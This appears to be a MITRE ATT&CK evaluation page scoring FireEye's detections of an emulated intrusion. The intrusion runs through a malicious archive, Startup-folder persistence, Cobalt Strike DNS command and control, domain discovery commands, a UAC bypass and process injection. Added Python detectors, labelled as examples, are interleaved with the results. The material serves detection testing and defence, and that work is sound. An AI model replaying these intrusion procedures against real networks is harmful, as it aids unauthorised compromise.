FireEye Managed Defense
FireEye Endpoint Security
FireEye Overview Tactic Page Information

The ATT&CK tactic page displays all tested techniques belonging to that tactic, as well as all procedures and their respective detections. The procedures are grouped by their technique. The Procedure column contains a description of how the technique was tested. The Step column is where in the operational flow the procedure occurred. Click the Step Number to view it in the Operational Flow panel. Detections are classified by one or more Detection Types, summarized by the Detection Notes, and may be supported by Screenshots. The Operational Flow panel provides the context around when a procedure was executed by showing all steps of the evaluation, including the tactics, techniques and procedures of the executed steps.

MITRE does not assign scores, rankings, or ratings. The evaluation results are available to the public, so other organizations may provide their own analysis and interpretation - these are not endorsed or validated by MITRE.

Legend
Main Detection Categories: None, Telemetry, Indicator of Compromise, General Behavior, Specific Behavior, Enrichment
Detection Modifiers: Tainted, Delayed, Configuration Change
Step | Procedures | Technique | Detection Type | Detection Notes | Screenshots
1.A.1
Legitimate user Debbie clicked and executed malicious self-extracting archive (Resume Viewer.exe) on 10.0.1.6 (Nimda)
User Execution
(T1204)
General Behavior (Configuration Change)
A General Behavior alert was generated for the Resume Viewer.exe file due to it being labeled as malicious by a machine learning engine. The alert was generated after a configuration change of the file size limit for the machine learning engine. The vendor reported that this file would have been quarantined and prevented from executing. The scan type used to produce this alert is On-access, which means the scan occurs on file writes and executions.
Telemetry
Telemetry showed Resume Viewer.exe executing with a parent process of explorer.exe.
General Behavior alert showing Resume Viewer.exe labeled as Malware (alert triggered after configuration change)
Telemetry showing Resume Viewer.exe being executed by explorer.exe
Rundll32
(T1085)
Enrichment
The capability enriched rundll32.exe with an alert for Rundll32 Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1085 - Rundll32) and Tactics (Defense Evasion, Execution).
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified use of rundll32.exe to execute update.dat with command-line arguments. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of rundll32.exe execution (tagged with correct ATT&CK Technique, T1085 - Rundll32, and Tactics, Defense Evasion, Execution)
Excerpt from the Managed Defense Report indicating rundll32.exe was used for execution (Specific Behavior)
Scripting
(T1064)
Telemetry
Telemetry showed Resume Viewer.exe spawning the child process cmd.exe to launch pdfhelper.cmd.
Telemetry showing the child cmd.exe process running the pdfhelper.cmd script
1.B.1
Previously executed batch file (pdfhelper.cmd) moved a separate batch file (autoupdate.bat) to the Startup folder
Registry Run Keys / Startup Folder
(T1060)
Telemetry
Telemetry showed autoupdate.bat being written to the Startup folder. The alert mapped to two ATT&CK Techniques (T1059 - Command-Line Interface and T1105 - Remote File Copy), but they were not directly related to the Registry Run Keys / Startup Folder Technique under test in this procedure.
Enrichment
The capability enriched the file write of autoupdate.bat to the Startup folder by categorizing it as Persistence.
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified the backdoor persisted by executing autoupdate.bat at system start due to its presence in the Startup directory. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Telemetry showing autoupdate.bat file written to the Startup folder
Enrichment of autoupdate.bat being written to Startup with Persistence category
Additional details on enrichment of autoupdate.bat
Excerpt from the Managed Defense Report indicating the backdoor persisted via autoupdate.bat being written to the Startup directory (Specific Behavior)
1.C.1
Cobalt Strike: C2 channel established
Commonly Used Port
(T1043)
Telemetry
Telemetry showed port 53 command and control traffic.
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it observed the use of UDP port 53 for DNS command and control traffic. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Telemetry showing port 53 command and control traffic
Excerpt from the Managed Defense Report indicating command and control occurred over UDP port 53 (Specific Behavior)
Data Encoding
(T1132)
Telemetry (Tainted)
Telemetry showed base64-encoded DNS requests to freegoogleadsenseinfo.com (C2 domain). The telemetry was tainted by the parent Cobalt Strike DNS Beacon alert.
Telemetry showing encoded DNS requests (tainted by parent Cobalt Strike DNS Beacon alert)
Standard Application Layer Protocol
(T1071)
Indicator of Compromise
An Indicator of Compromise alert was generated for the hardcoded DNS record name syntax in the DNS lookups for freegoogleadsenseinfo.com (C2 domain). The alert was also tagged with the correct ATT&CK Technique (T1071 - Standard Application Layer Protocol) and Tactic (Command and Control).
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified that command and control occurred via DNS. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Indicator of Compromise alert for DNS lookups (tagged with correct ATT&CK Technique, T1071 - Standard Application Layer Protocol, and Tactic, Command and Control)
Excerpt from the Managed Defense Report indicating command and control occurred via DNS (Specific Behavior)
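The telemetry for step 1.C.1 above rests on two observations: long base64-encoded labels in DNS requests, and many such requests against one registered domain. The following is an added example of how a detection engineer might turn those observations into a rule; it is not FireEye's or MITRE's code. The lookup records are constructed (the domain freegoogleadsenseinfo.com comes from the page, the labels are invented) and the thresholds for label length, entropy and hit count are assumptions.

```python
"""Heuristic detector for DNS command and control: base64-shaped, high-entropy
subdomain labels repeated against one registered domain.
Added example (not FireEye's or MITRE's code). The lookup records are
constructed; the thresholds (label length 16, entropy 3.5, 3 hits) are assumptions."""
import math
import re
from collections import Counter

# Constructed DNS lookup telemetry as (source host, queried name). The C2 domain
# freegoogleadsenseinfo.com is the one named on the page; the labels are invented.
SAMPLE_LOOKUPS = [
    ("nimda", "www.microsoft.com"),
    ("nimda", "aHR0cDovL2V4YW1wbGU.freegoogleadsenseinfo.com"),
    ("nimda", "Y29tbWFuZC1hbmQtY29udHJvbA.freegoogleadsenseinfo.com"),
    ("nimda", "ZXhmaWwgZGF0YSBzZWdtZW50.freegoogleadsenseinfo.com"),
    ("nimda", "c29tZSBtb3JlIGRhdGE.freegoogleadsenseinfo.com"),
    ("nimda", "mail.shockwave.local"),
    ("conficker", "update.shockwave.local"),
]

# Standard and URL-safe base64 alphabets; padding is usually stripped in DNS labels.
BASE64_LABEL = re.compile(r"^[A-Za-z0-9+/=_-]+$")


def shannon_entropy(text):
    """Bits of entropy per character; encoded payloads score high, words score low."""
    counts = Counter(text)
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registered_domain(name):
    """Last two labels of the name. Real code should consult the public suffix list
    (assumption: every domain of interest here has a one-label suffix)."""
    parts = name.lower().rstrip(".").split(".")
    return ".".join(parts[-2:])


def label_looks_encoded(label, min_len=16, min_entropy=3.5):
    """True if the label is long, base64-shaped and high-entropy."""
    return (
        len(label) >= min_len
        and BASE64_LABEL.match(label) is not None
        and shannon_entropy(label) >= min_entropy
    )


def score_lookups(lookups, min_hits=3):
    """Count encoded-subdomain lookups per (host, registered domain) and return
    the pairs that reach min_hits, i.e. a sustained encoded channel rather than
    a single odd-looking name."""
    hits = Counter()
    for host, name in lookups:
        labels = name.rstrip(".").split(".")  # keep case: it matters for entropy
        subdomain_labels = labels[:-2]
        if any(label_looks_encoded(label) for label in subdomain_labels):
            hits[(host, registered_domain(name))] += 1
    return {key: count for key, count in hits.items() if count >= min_hits}


if __name__ == "__main__":
    for (host, domain), count in score_lookups(SAMPLE_LOOKUPS).items():
        print(f"{host}: {count} encoded lookups against {domain}")
```

Run as a script it reports four encoded lookups from nimda against freegoogleadsenseinfo.com and nothing for the ordinary names. CDN and telemetry domains legitimately use long random-looking labels, so a production version of this rule needs an allow-list of known domains in front of the entropy check.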
2.A.1
Cobalt Strike: 'ipconfig /all' via cmd
System Network Configuration Discovery
(T1016)
Enrichment
The capability enriched ipconfig.exe with an alert for Ipconfig Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1016 - System Network Configuration Discovery) and Tactic (Discovery).
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified that ipconfig.exe was one of the reconnaissance commands performed to enumerate the network configuration of Nimda. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of ipconfig.exe with Ipconfig Execution alert (tagged with correct ATT&CK Technique, T1016 - System Network Configuration Discovery, and Tactic, Discovery)
Excerpt from the Managed Defense Report indicating ipconfig.exe was used to enumerate the network configuration of Nimda (Specific Behavior)
Excerpt from the Managed Defense Report with additional details about ipconfig.exe execution
2.A.2
Cobalt Strike: 'arp -a' via cmd
System Network Configuration Discovery
(T1016)
Enrichment
The capability enriched arp.exe with an alert for Arp Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1016 - System Network Configuration Discovery) and Tactic (Discovery).
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified that arp.exe was one of the reconnaissance commands performed to enumerate the network configuration of Nimda. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of arp.exe with Arp Execution alert (tagged with correct ATT&CK Technique, T1016 - System Network Configuration Discovery, and Tactic, Discovery)
Excerpt from the Managed Defense Report indicating arp.exe was used to enumerate the network configuration of Nimda (Specific Behavior)
Excerpt from the Managed Defense Report with additional details about arp.exe execution
2.B.1
Cobalt Strike: 'echo' via cmd to enumerate specific environment variables
System Owner / User Discovery
(T1033)
Telemetry
Telemetry showed the use of echo with command-line arguments.
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified that echo was one of the commands used to enumerate the current username. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Telemetry showing echo with command-line arguments
Excerpt from the Managed Defense Report indicating echo was used to enumerate the current username (Specific Behavior)
Excerpt from the Managed Defense Report with additional details about echo
2.C.1
Cobalt Strike: 'ps' (Process status) via Win32 APIs
Process Discovery
(T1057)
None
No detection capability demonstrated for this procedure.
2.C.2
Cobalt Strike: 'tasklist /v' via cmd
Process Discovery
(T1057)
Enrichment
The capability enriched tasklist.exe with an alert for Tasklist Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1057 - Process Discovery) and Tactic (Discovery).
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified that tasklist was one of the commands used to enumerate current running processes. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of tasklist.exe with Tasklist Execution alert (tagged with correct ATT&CK Technique, T1057 - Process Discovery, and Tactic, Discovery)
Excerpt from the Managed Defense Report indicating tasklist was used to enumerate current running processes (Specific Behavior)
Excerpt from the Managed Defense Report with additional details about tasklist
2.D.1
Cobalt Strike: 'sc query' via cmd
System Service Discovery
(T1007)
Enrichment
The capability enriched sc.exe with an alert for SC Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1007 - System Service Discovery) and Tactic (Discovery).
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified that sc was one of the commands used to enumerate current running services. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of sc.exe with SC Execution alert (tagged with correct ATT&CK Technique, T1007 - System Service Discovery, and Tactic, Discovery)
Additional details from enrichment of sc.exe
Excerpt from the Managed Defense Report indicating sc was used to enumerate current running services (Specific Behavior)
Excerpt from the Managed Defense Report with additional details about sc
2.D.2
Cobalt Strike: 'net start' via cmd
System Service Discovery
(T1007)
Enrichment
The capability enriched net.exe with an alert for Net Start Command Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1007 - System Service Discovery) and Tactic (Discovery).
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified that net was one of the commands used to enumerate current running services. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of net.exe with Net Start Command Execution alert (tagged with correct ATT&CK Technique, T1007 - System Service Discovery, and Tactic, Discovery)
Excerpt from the Managed Defense Report indicating net was used to enumerate current running services (Specific Behavior)
Excerpt from the Managed Defense Report with additional details about net
2.E.1
Cobalt Strike: 'systeminfo' via cmd
System Information Discovery
(T1082)
Enrichment
The capability enriched systeminfo.exe with an alert for Systeminfo Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1082 - System Information Discovery) and Tactic (Discovery).
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified systeminfo as a reconnaissance command used to obtain details from the system. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of systeminfo.exe with Systeminfo Execution alert (tagged with correct ATT&CK Technique, T1082 - System Information Discovery, and Tactic, Discovery)
Excerpt from the Managed Defense Report indicating systeminfo was a reconnaissance command used to obtain system details (Specific Behavior)
Excerpt from the Managed Defense Report with additional details about systeminfo
2.E.2
Cobalt Strike: 'net config workstation' via cmd
System Information Discovery
(T1082)
Enrichment
The capability enriched net.exe with an alert for Net Config Command Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1082 - System Information Discovery) and Tactic (Discovery).
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it identified net config as a reconnaissance command performed. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of net.exe with Net Config Command Execution alert (tagged with correct ATT&CK Technique, T1082 - System Information Discovery, and Tactic, Discovery)
Excerpt from the Managed Defense Report indicating net config was a reconnaissance command (General Behavior)
Excerpt from the Managed Defense Report with additional details about net
2.F.1
Cobalt Strike: 'net localgroup administrators' via cmd
Permission Groups Discovery
(T1069)
Enrichment
The capability enriched net.exe with an alert for Net Group Command Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1069 - Permission Groups Discovery) and Tactic (Discovery).
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified that the attacker enumerated members of the local administrators group. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of net.exe with Net Group Command Execution alert (tagged with correct ATT&CK Technique, T1069 - Permission Groups Discovery, and Tactic, Discovery)
Excerpt from the Managed Defense Report indicating the attacker enumerated members of the local administrators group (Specific Behavior)
Excerpt from the Managed Defense Report with additional details about net
2.F.2
Cobalt Strike: 'net localgroup administrators /domain' via cmd
Permission Groups Discovery
(T1069)
Enrichment
The capability enriched net.exe with an alert for Net Group Command Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1069 - Permission Groups Discovery) and Tactic (Discovery).
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified that the attacker enumerated members of the local administrators group. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of net.exe with Net Group Command Execution alert (tagged with correct ATT&CK Technique, T1069 - Permission Groups Discovery, and Tactic, Discovery)
Excerpt from the Managed Defense Report indicating the attacker enumerated members of the local administrators group (Specific Behavior)
Excerpt from the Managed Defense Report with additional details about net
2.F.3
Cobalt Strike: 'net group "Domain Admins" /domain' via cmd
Permission Groups Discovery
(T1069)
Enrichment
The capability enriched net.exe with an alert for Net Group Command Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1069 - Permission Groups Discovery) and Tactic (Discovery).
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified that the attacker enumerated the Shockwave domain's Domain Administrators group. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of net.exe with Net Group Command Execution alert (tagged with correct ATT&CK Technique, T1069 - Permission Groups Discovery, and Tactic, Discovery)
Excerpt from the Managed Defense Report indicating the attacker enumerated the Domain Administrators group (Specific Behavior)
Excerpt from the Managed Defense Report with additional details about net
2.G.1
Cobalt Strike: 'net user /domain' via cmd
Account Discovery
(T1087)
Enrichment
The capability enriched net.exe with an alert for Net User Command Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1087 - Account Discovery) and Tactic (Discovery).
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it identified net user as a reconnaissance command performed. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of net.exe with Net User Command Execution alert (tagged with correct ATT&CK Technique, T1087 - Account Discovery, and Tactic, Discovery)
Excerpt from the Managed Defense Report indicating net user was a reconnaissance command (General Behavior)
Excerpt from the Managed Defense Report with additional details about net
2.G.2
Cobalt Strike: 'net user george /domain' via cmd
Account Discovery
(T1087)
Enrichment
The capability enriched net.exe with an alert for Net User Command Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1087 - Account Discovery) and Tactic (Discovery).
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it identified net user as a reconnaissance command performed. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of net.exe with Net User Command Execution alert (tagged with correct ATT&CK Technique, T1087 - Account Discovery, and Tactic, Discovery)
Excerpt from the Managed Defense Report indicating net user was a reconnaissance command (General Behavior)
Excerpt from the Managed Defense Report with additional details about net
2.H.1
Cobalt Strike: 'reg query' via cmd to enumerate a specific Registry key
Query Registry
(T1012)
Enrichment
The capability enriched reg.exe with an alert for Reg Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1012 - Query Registry) and Tactic (Discovery).
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because the attacker queried a registry key that contains system policy configurations. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of reg.exe with Reg Execution alert (tagged with correct ATT&CK Technique, T1012 - Query Registry, and Tactic, Discovery)
Excerpt from the Managed Defense Report indicating the attacker queried a registry key that contains system policy configurations (Specific Behavior)
Excerpt from the Managed Defense Report with additional details about reg
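Every Step 2 procedure above follows the same pattern: the endpoint product tags an individual discovery command as a Weak Signal with an ATT&CK technique, and the Managed Defense analysts later roll several of those signals up into one reconnaissance finding. The block below is an added example of that two-stage logic, written for this page and not FireEye's code. The technique mapping is copied from the tags reported above (echo is omitted because the page shows telemetry only for it); the process events are constructed, and the five-minute window and the threshold of three distinct techniques are assumptions.

```python
"""Weak-signal enrichment of discovery commands, and the roll-up of several weak
signals on one host into a single reconnaissance alert.
Added example, not FireEye's code. Process events are constructed; the 5-minute
window and the threshold of three distinct techniques are assumptions."""
from collections import defaultdict
from datetime import datetime, timedelta

# Technique tags as reported on this page, keyed by image name and, for net.exe,
# the sub-command. echo produced telemetry only on the page, so it is not listed.
WEAK_SIGNALS = {
    ("ipconfig.exe", None): ("Ipconfig Execution", "T1016"),
    ("arp.exe", None): ("Arp Execution", "T1016"),
    ("tasklist.exe", None): ("Tasklist Execution", "T1057"),
    ("sc.exe", None): ("SC Execution", "T1007"),
    ("systeminfo.exe", None): ("Systeminfo Execution", "T1082"),
    ("reg.exe", None): ("Reg Execution", "T1012"),
    ("net.exe", "start"): ("Net Start Command Execution", "T1007"),
    ("net.exe", "config"): ("Net Config Command Execution", "T1082"),
    ("net.exe", "localgroup"): ("Net Group Command Execution", "T1069"),
    ("net.exe", "group"): ("Net Group Command Execution", "T1069"),
    ("net.exe", "user"): ("Net User Command Execution", "T1087"),
}

T0 = datetime(2019, 1, 1, 10, 0, 0)  # constructed base time

# Constructed process-start telemetry: host, image, command line, start time.
SAMPLE_EVENTS = [
    {"host": "nimda", "image": "ipconfig.exe", "cmdline": "ipconfig /all", "time": T0},
    {"host": "nimda", "image": "arp.exe", "cmdline": "arp -a", "time": T0 + timedelta(seconds=20)},
    {"host": "nimda", "image": "cmd.exe", "cmdline": "cmd /c echo %USERNAME%", "time": T0 + timedelta(seconds=40)},
    {"host": "nimda", "image": "tasklist.exe", "cmdline": "tasklist /v", "time": T0 + timedelta(seconds=60)},
    {"host": "nimda", "image": "net.exe", "cmdline": "net localgroup administrators", "time": T0 + timedelta(seconds=90)},
    {"host": "conficker", "image": "net.exe", "cmdline": "net user backup /domain", "time": T0 - timedelta(hours=1)},
]


def enrich(event):
    """Return (alert name, technique id) for one process event, or None."""
    image = event["image"].lower()
    tokens = event["cmdline"].split()
    sub_command = tokens[1].lower() if len(tokens) > 1 else None
    return WEAK_SIGNALS.get((image, sub_command)) or WEAK_SIGNALS.get((image, None))


def reconnaissance_bursts(events, window=timedelta(minutes=5), min_distinct=3):
    """Map host -> sorted technique ids for hosts where at least min_distinct
    distinct discovery techniques fire within one window."""
    signals = defaultdict(list)
    for event in sorted(events, key=lambda e: e["time"]):
        hit = enrich(event)
        if hit:
            signals[event["host"]].append((event["time"], hit[1]))
    alerts = {}
    for host, hits in signals.items():
        for start, (t_start, _) in enumerate(hits):
            techniques = {tid for t, tid in hits[start:] if t - t_start <= window}
            if len(techniques) >= min_distinct:
                alerts[host] = sorted(techniques)
                break
    return alerts


if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(event["host"], event["cmdline"], "->", enrich(event))
    print(reconnaissance_bursts(SAMPLE_EVENTS))
```

Counting distinct techniques rather than raw signals is deliberate: a help-desk script that runs ipconfig three times produces three weak signals but only one technique, while the sequence on nimda (network configuration, process list, local group membership) crosses three techniques in ninety seconds and is what an analyst would call reconnaissance.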
3.A.1
Cobalt Strike: Built-in UAC bypass token duplication capability executed to elevate process integrity level
Access Token Manipulation
(T1134)
Telemetry (Configuration Change)
Telemetry showed a svchost.exe seclogon event for a token logon ID later used by a process whose group membership indicated high integrity. A Configuration Change was made in order to collect Windows Event Logs for events 4627 (Group Membership Information) and 4673 (A privileged service was called).
Telemetry showing svchost.exe seclogon event for token logon ID 0xfcf5fd
Telemetry showing group membership of token logon ID 0xfcf5fd, which includes S-1-16-12288 (High Mandatory Level)
Bypass User Account Control
(T1088)
Telemetry (Configuration Change)
Telemetry showed execution of powershell.exe as a high integrity process as SYSTEM with a token logon ID previously associated with user Debbie. A Configuration Change was made in order to collect Windows Event Logs for events 4627 (Group Membership Information) and 4673 (A privileged service was called).
Telemetry showing execution of powershell.exe running as SYSTEM with token logon ID 0xfcf5fd
Telemetry showing group membership of token logon ID 0xfcf5fd, associated with user Debbie, which includes S-1-16-12288 (High Mandatory Level)
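The 3.A.1 detections above work by joining two data sources on the logon ID: event 4627 lists the groups (including the mandatory-level SID) attached to a logon session, and process telemetry records which logon ID each process ran under. The block below is an added example of that join, written for this page and not FireEye's code. The events are constructed; logon ID 0xfcf5fd and the High Mandatory Level SID S-1-16-12288 are taken from the page, the other SIDs are well-known Windows values, and the set of "standard" users is an assumption.

```python
"""Correlate Windows event 4627 (Group Membership Information) with process-start
telemetry to spot a standard user's logon session carrying a high-integrity token,
or being used by a process running as a different account.
Added example, not FireEye's code; the events are constructed and the set of
standard users is an assumption."""

# Well-known mandatory-level SIDs that appear in the group list of a token.
INTEGRITY_LEVELS = {
    "S-1-16-4096": "Low",
    "S-1-16-8192": "Medium",
    "S-1-16-12288": "High",
    "S-1-16-16384": "System",
}
ELEVATED = {"High", "System"}

# Constructed 4627 events: which account and which groups a logon ID carries.
SAMPLE_4627 = [
    {"logon_id": "0x3e7", "account": "SYSTEM", "groups": ["S-1-5-18", "S-1-16-16384"]},
    {"logon_id": "0x2a9b1", "account": "Debbie", "groups": ["S-1-5-32-545", "S-1-16-8192"]},
    {"logon_id": "0xfcf5fd", "account": "Debbie", "groups": ["S-1-5-32-544", "S-1-16-12288"]},
]

# Constructed process-start telemetry: user and logon ID each process ran under.
SAMPLE_PROCESSES = [
    {"image": "svchost.exe", "user": "SYSTEM", "logon_id": "0x3e7"},
    {"image": "explorer.exe", "user": "Debbie", "logon_id": "0x2a9b1"},
    {"image": "powershell.exe", "user": "SYSTEM", "logon_id": "0xfcf5fd"},
]


def integrity_of(groups):
    """Mandatory level named by the token's group SIDs, or None if absent."""
    for sid in groups:
        if sid in INTEGRITY_LEVELS:
            return INTEGRITY_LEVELS[sid]
    return None


def find_token_elevation(events_4627, processes, standard_users):
    """Return findings for processes whose logon ID was established for a standard
    user but carries an elevated mandatory level, or whose running account differs
    from the account the logon session was created for."""
    session = {ev["logon_id"]: ev for ev in events_4627}
    findings = []
    for proc in processes:
        ev = session.get(proc["logon_id"])
        if ev is None:
            continue  # no group information was collected for this logon ID
        level = integrity_of(ev["groups"])
        reasons = []
        if ev["account"] in standard_users and level in ELEVATED:
            reasons.append(f"standard user {ev['account']} holds {level} integrity")
        if proc["user"] != ev["account"]:
            reasons.append(f"process runs as {proc['user']} on session of {ev['account']}")
        if reasons:
            findings.append({
                "process": proc["image"],
                "logon_id": proc["logon_id"],
                "integrity": level,
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for finding in find_token_elevation(SAMPLE_4627, SAMPLE_PROCESSES, {"Debbie"}):
        print(finding)
```

The benign rows show why both checks are needed: the SYSTEM session 0x3e7 is elevated but belongs to SYSTEM, and Debbie's interactive session 0x2a9b1 is hers but only Medium integrity; only 0xfcf5fd trips both conditions. Event 4627 is not collected by default, which is exactly why the page records a Configuration Change for this step.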
3.B.1
Cobalt Strike: 'ps' (Process status) via Win32 APIs
Process Discovery
(T1057)
None
No detection capability demonstrated for this procedure.
3.C.1
Cobalt Strike: Built-in process injection capability executed to inject callback into cmd.exe
Process Injection
(T1055)
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified a process injection from PowerShell.exe to cmd.exe. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. The vendor stated the process injection detection capability is an HX plugin that is only available within the Managed Defense Service, and the data is reported to a separate cloud server which is not accessible to customers at this time.
Excerpt from the Managed Defense Report identifying a process injection from PowerShell.exe to cmd.exe (Specific Behavior)
Continued excerpt from the Managed Defense Report showing the artifact evidence of a process injection from PowerShell.exe to cmd.exe
4.A.1
Cobalt Strike: 'net group "Domain Controllers" /domain' via cmd
Remote System Discovery
(T1018)
Enrichment
The capability enriched net.exe with an alert for Net Group Command Execution (Weak Signal). The alert was also tagged with a related ATT&CK Technique (T1069 - Permission Groups Discovery) and the correct Tactic (Discovery).
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it identified net group as one of the reconnaissance commands performed. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of net.exe with Net Group Command Execution alert (tagged with related ATT&CK Technique, T1069 - Permission Groups Discovery, and correct Tactic, Discovery)
Excerpt from the Managed Defense Report indicating net group was a reconnaissance command (General Behavior)
Excerpt from the Managed Defense Report with additional details about net group
4.A.2
Cobalt Strike: 'net group "Domain Computers" /domain' via cmd
Remote System Discovery
(T1018)
Enrichment
The capability enriched net.exe with an alert for Net Group Command Execution (Weak Signal). The alert was also tagged with a related ATT&CK Technique (T1069 - Permission Groups Discovery) and the correct Tactic (Discovery).
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it identified net group as one of the reconnaissance commands performed. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of net.exe with Net Group Command Execution alert (tagged with related ATT&CK Technique, T1069 - Permission Groups Discovery, and correct Tactic, Discovery)
Excerpt from the Managed Defense Report indicating net group was a reconnaissance command (General Behavior)
Excerpt from the Managed Defense Report with additional details about net group
4.B.1
Cobalt Strike: 'netsh advfirewall show allprofiles' via cmd
System Network Configuration Discovery
(T1016)
Enrichment
The capability enriched netsh.exe with an alert for Netsh Execution (Weak Signal). The alert was also tagged with a related ATT&CK Technique (T1063 - Security Software Discovery) and the correct Tactic (Discovery).
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified that netsh was a reconnaissance command used to obtain network configuration and the configuration profile of the Windows Firewall. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of netsh.exe with Netsh Execution alert (tagged with related ATT&CK Technique, T1063 - Security Software Discovery, and correct Tactic, Discovery)
Excerpt from the Managed Defense Report indicating netsh was used to obtain network configuration and the configuration profile of the Windows Firewall (Specific Behavior)
Excerpt from the Managed Defense Report with additional details about netsh
4.C.1
Cobalt Strike: 'netstat -ano' via cmd
System Network Connections Discovery
(T1049)
Enrichment
The capability enriched netstat.exe with an alert for Netstat Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1049 - System Network Connections Discovery) and Tactic (Discovery).
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified that netstat was a reconnaissance command used to enumerate active and listening network ports. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of netstat.exe with Netstat Execution alert (tagged with the correct ATT&CK Technique, T1049 - System Network Connections Discovery, and Tactic, Discovery)
Excerpt from the Managed Defense Report indicating netstat was used to enumerate active and listening network ports (Specific Behavior)
